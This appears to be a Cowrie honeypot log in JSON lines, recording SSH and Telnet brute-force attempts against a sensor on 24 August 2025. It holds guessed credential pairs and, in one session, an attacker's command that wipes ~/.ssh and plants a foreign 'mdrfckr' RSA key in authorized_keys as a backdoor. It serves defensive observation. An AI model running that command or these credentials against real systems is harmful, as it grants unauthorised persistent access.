{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T20:37:36.266949Z","src_ip":"213.108.243.7","session":"2cd424685f84"}
{"eventid":"cowrie.login.success","username":"root","password":"2024M@x","message":"login attempt [root/2024M@x] succeeded","sensor":"my-vps","timestamp":"2025-08-24T20:37:36.543530Z","src_ip":"213.108.243.7","session":"2cd424685f84"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T20:37:36.766814Z","src_ip":"213.108.243.7","session":"2cd424685f84"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-24T20:37:36.767468Z","src_ip":"213.108.243.7","session":"2cd424685f84"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:37:36.864272Z","src_ip":"213.108.243.7","session":"2cd424685f84"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:37:36.865635Z","src_ip":"213.108.243.7","session":"2cd424685f84"}
{"eventid":"cowrie.session.connect","src_ip":"118.45.79.141","src_port":59457,"dst_ip":"1.2.3.4","dst_port":23,"session":"b13d7ea558a8","protocol":"telnet","message":"New connection: 118.45.79.141:59457 (1.2.3.4:23) [session: b13d7ea558a8]","sensor":"my-vps","timestamp":"2025-08-24T20:38:36.508559Z"}
{"eventid":"cowrie.session.closed","duration":30.44342803955078,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:39:06.951909Z","src_ip":"118.45.79.141","session":"b13d7ea558a8"}
{"eventid":"cowrie.session.connect","src_ip":"101.187.203.166","src_port":50322,"dst_ip":"1.2.3.4","dst_port":22,"session":"89b285443456","protocol":"ssh","message":"New connection: 101.187.203.166:50322 (1.2.3.4:22) [session: 89b285443456]","sensor":"my-vps","timestamp":"2025-08-24T20:40:07.901467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh-0.3.0","message":"Remote SSH version: SSH-2.0-libssh-0.3.0","sensor":"my-vps","timestamp":"2025-08-24T20:40:08.211971Z","src_ip":"101.187.203.166","session":"89b285443456"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:40:08.519808Z","src_ip":"101.187.203.166","session":"89b285443456"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51870,"dst_ip":"1.2.3.4","dst_port":22,"session":"59c780fa4cad","protocol":"ssh","message":"New connection: 217.72.205.35:51870 (1.2.3.4:22) [session: 59c780fa4cad]","sensor":"my-vps","timestamp":"2025-08-24T20:41:35.123408Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:41:35.124608Z","src_ip":"217.72.205.35","session":"59c780fa4cad"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55390,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e3463dc4d6e","protocol":"ssh","message":"New connection: 217.72.205.35:55390 (1.2.3.4:22) [session: 7e3463dc4d6e]","sensor":"my-vps","timestamp":"2025-08-24T20:48:09.501605Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:48:09.502722Z","src_ip":"217.72.205.35","session":"7e3463dc4d6e"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":56976,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a0ca3fd1afc","protocol":"ssh","message":"New connection: 14.103.129.89:56976 (1.2.3.4:22) [session: 0a0ca3fd1afc]","sensor":"my-vps","timestamp":"2025-08-24T20:48:18.540854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T20:48:18.541847Z","src_ip":"14.103.129.89","session":"0a0ca3fd1afc"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-24T20:48:18.739348Z","src_ip":"14.103.129.89","session":"0a0ca3fd1afc"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:48:27.033038Z","src_ip":"14.103.129.89","session":"0a0ca3fd1afc"}
{"eventid":"cowrie.session.connect","src_ip":"101.187.203.166","src_port":52244,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e0224b29764","protocol":"ssh","message":"New connection: 101.187.203.166:52244 (1.2.3.4:22) [session: 0e0224b29764]","sensor":"my-vps","timestamp":"2025-08-24T20:48:27.355500Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh-0.7.3","message":"Remote SSH version: SSH-2.0-libssh-0.7.3","sensor":"my-vps","timestamp":"2025-08-24T20:48:27.671208Z","src_ip":"101.187.203.166","session":"0e0224b29764"}
{"eventid":"cowrie.client.kex","hassh":"c8c5fbf80b7b0a1b0e4de5e683f3c5ad","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,blowfish-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","blowfish-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c8c5fbf80b7b0a1b0e4de5e683f3c5ad","sensor":"my-vps","timestamp":"2025-08-24T20:48:27.972707Z","src_ip":"101.187.203.166","session":"0e0224b29764"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-24T20:48:29.503533Z","src_ip":"101.187.203.166","session":"0e0224b29764"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:48:30.806367Z","src_ip":"101.187.203.166","session":"0e0224b29764"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":57778,"dst_ip":"1.2.3.4","dst_port":22,"session":"24fffe80a4e0","protocol":"ssh","message":"New connection: 129.226.183.73:57778 (1.2.3.4:22) [session: 24fffe80a4e0]","sensor":"my-vps","timestamp":"2025-08-24T20:49:29.170689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T20:49:29.180122Z","src_ip":"129.226.183.73","session":"24fffe80a4e0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T20:49:29.431966Z","src_ip":"129.226.183.73","session":"24fffe80a4e0"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"jenkins1","message":"login attempt [jenkins/jenkins1] failed","sensor":"my-vps","timestamp":"2025-08-24T20:49:30.452708Z","src_ip":"129.226.183.73","session":"24fffe80a4e0"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:49:31.712874Z","src_ip":"129.226.183.73","session":"24fffe80a4e0"}
{"eventid":"cowrie.session.connect","src_ip":"60.221.239.232","src_port":58196,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1d3f335fb96","protocol":"ssh","message":"New connection: 60.221.239.232:58196 (1.2.3.4:22) [session: f1d3f335fb96]","sensor":"my-vps","timestamp":"2025-08-24T20:49:45.183290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T20:49:45.184412Z","src_ip":"60.221.239.232","session":"f1d3f335fb96"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T20:49:45.340301Z","src_ip":"60.221.239.232","session":"f1d3f335fb96"}
{"eventid":"cowrie.login.failed","username":"red","password":"red","message":"login attempt [red/red] failed","sensor":"my-vps","timestamp":"2025-08-24T20:49:46.002633Z","src_ip":"60.221.239.232","session":"f1d3f335fb96"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:49:47.161517Z","src_ip":"60.221.239.232","session":"f1d3f335fb96"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":43184,"dst_ip":"1.2.3.4","dst_port":22,"session":"0aeb20a9b379","protocol":"ssh","message":"New connection: 45.88.8.215:43184 (1.2.3.4:22) [session: 0aeb20a9b379]","sensor":"my-vps","timestamp":"2025-08-24T20:52:13.642169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T20:52:14.292830Z","src_ip":"45.88.8.215","session":"0aeb20a9b379"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T20:52:14.293820Z","src_ip":"45.88.8.215","session":"0aeb20a9b379"}
{"eventid":"cowrie.login.success","username":"root","password":"Avirat@123","message":"login attempt [root/Avirat@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T20:52:16.188146Z","src_ip":"45.88.8.215","session":"0aeb20a9b379"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:52:16.744664Z","src_ip":"45.88.8.215","session":"0aeb20a9b379"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":50818,"dst_ip":"1.2.3.4","dst_port":22,"session":"393483be7686","protocol":"ssh","message":"New connection: 129.226.183.73:50818 (1.2.3.4:22) [session: 393483be7686]","sensor":"my-vps","timestamp":"2025-08-24T20:52:48.508192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T20:52:48.511978Z","src_ip":"129.226.183.73","session":"393483be7686"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T20:52:48.766378Z","src_ip":"129.226.183.73","session":"393483be7686"}
{"eventid":"cowrie.login.success","username":"root","password":"admin@520","message":"login attempt [root/admin@520] succeeded","sensor":"my-vps","timestamp":"2025-08-24T20:52:49.799513Z","src_ip":"129.226.183.73","session":"393483be7686"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T20:52:50.359301Z","src_ip":"129.226.183.73","session":"393483be7686"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T20:52:50.360184Z","src_ip":"129.226.183.73","session":"393483be7686"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T20:52:50.361523Z","src_ip":"129.226.183.73","session":"393483be7686"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:52:50.623919Z","src_ip":"129.226.183.73","session":"393483be7686"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T20:52:51.238760Z","src_ip":"129.226.183.73","session":"393483be7686"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T20:52:51.239437Z","src_ip":"129.226.183.73","session":"393483be7686"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T20:52:51.504055Z","src_ip":"129.226.183.73","session":"393483be7686"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:52:51.504977Z","src_ip":"129.226.183.73","session":"393483be7686"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":52036,"dst_ip":"1.2.3.4","dst_port":22,"session":"499900017b72","protocol":"ssh","message":"New connection: 129.226.183.73:52036 (1.2.3.4:22) [session: 499900017b72]","sensor":"my-vps","timestamp":"2025-08-24T20:52:51.760375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T20:52:51.768873Z","src_ip":"129.226.183.73","session":"499900017b72"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T20:52:52.024669Z","src_ip":"129.226.183.73","session":"499900017b72"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T20:52:53.054803Z","src_ip":"129.226.183.73","session":"499900017b72"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:52:54.321614Z","src_ip":"129.226.183.73","session":"499900017b72"}
